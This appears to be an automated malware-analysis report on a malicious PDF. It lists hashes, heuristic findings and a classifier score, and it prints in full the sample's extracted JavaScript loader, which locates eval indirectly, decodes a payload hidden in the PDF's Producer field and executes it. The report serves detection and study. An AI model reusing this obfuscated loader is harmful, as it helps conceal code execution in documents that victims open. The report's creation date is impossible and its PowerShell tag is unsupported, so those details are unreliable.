PDF malware analysis — malicious · 2fcd5f1ddf6d9cac

MALICIOUS

PDF

25.0 KB Created: 2011-72-51 03:25:00 First seen: 2026-05-09

MD5: eec66abfb3f59911b2a40b0ccdc26b10 SHA-1: da63a95c2b110be6e669ba1c6a964e73ade9c8e6 SHA-256: 2fcd5f1ddf6d9cac6895d26af056c4ebfa28ecb650e48ecca3bbf17fbae0eb38

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF contains embedded JavaScript, flagged by multiple heuristics including a high-severity ML classifier. The JavaScript stream, named 'javascript_obj0001_000.js', is likely responsible for the malicious behavior. While the exact function is obfuscated, its presence strongly suggests an attempt to execute arbitrary code or exploit a PDF reader vulnerability. The ML classifier's high score further supports a malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

/Producer (String.fromCharCodet9.5*wqt4.t5*wqt8.5*wq8*wqt4.5*wqt6.5*wqt8.75*wqt5.75*wq15.t5*wq9.75*wq9.t5*wqt9.t5*wq14.t5*wq1t*wq14.t5*wq1t*wq9.t5*wqt9.t5*wq14.t5*wq1t*wq14.t5*wq1t*wq9.t5*wqt9.t5*wq1t.t5*wq13.5*wqt5.t5*wqt4.5*wq9.t5*wqt9.t5*wq1t.75*wq13.75*wqt4.5*wq14.t5*wq9.t5*wqt9.t5*wq1t*wq1t*wq1t*wq1t.t5*wq9.t5*wqt9.t5*wq14*wqt4.5*wq1t*wq1t*wq9.t5*wqt9.t5*wq1t.5*wq13*wq1t.75*wq13*wq9.t5*wqt9.t5*wqt5.5*wq13.75*wq14*wq14.t5*wq9.t5*wqt9.t5*wq1t.75*wqt5.t5*wq14*wq1t*wq9.t5*wqt9.t5*wq13.75*wq13*w …

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x61FD 352 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x61FD	352 bytes
SHA-256: `2ff35b965ac6c6a64f74f5c9d39299cc4297b83b71fcf43ba0c5e18cf896615a`
Preview script First 1,000 lines of the extracted script var qweval=5; for(var i in this) { if (i.indexOf('qwe') != -1) { ild=this[i.replace('qw','')]; } } ild('ini=this.producer'); htwhy=ild(ini.substr(0,19)); ini = ini.substr(19); ini = ini.replace(/t/g,'2'); ar = ini.split('q'); var s = ''; w = 4; for (i = 0; i < ar.length; i++) { rdsf = ild(ar[i]); s += htwhy(rdsf); } ild(s);

SHA-256: 2ff35b965ac6c6a64f74f5c9d39299cc4297b83b71fcf43ba0c5e18cf896615a

Preview script

First 1,000 lines of the extracted script

var qweval=5;
for(var i in this) {
	if (i.indexOf('qwe') != -1) {
		ild=this[i.replace('qw','')];
	}
}
ild('ini=this.producer');
htwhy=ild(ini.substr(0,19));
ini = ini.substr(19);
ini = ini.replace(/t/g,'2');
ar = ini.split('q');
var s = '';
w = 4;
for (i = 0; i < ar.length; i++) {
	rdsf = ild(ar[i]);
	s += htwhy(rdsf);
}
ild(s);

Open this report in the interactive analyzer, or submit your own file for analysis.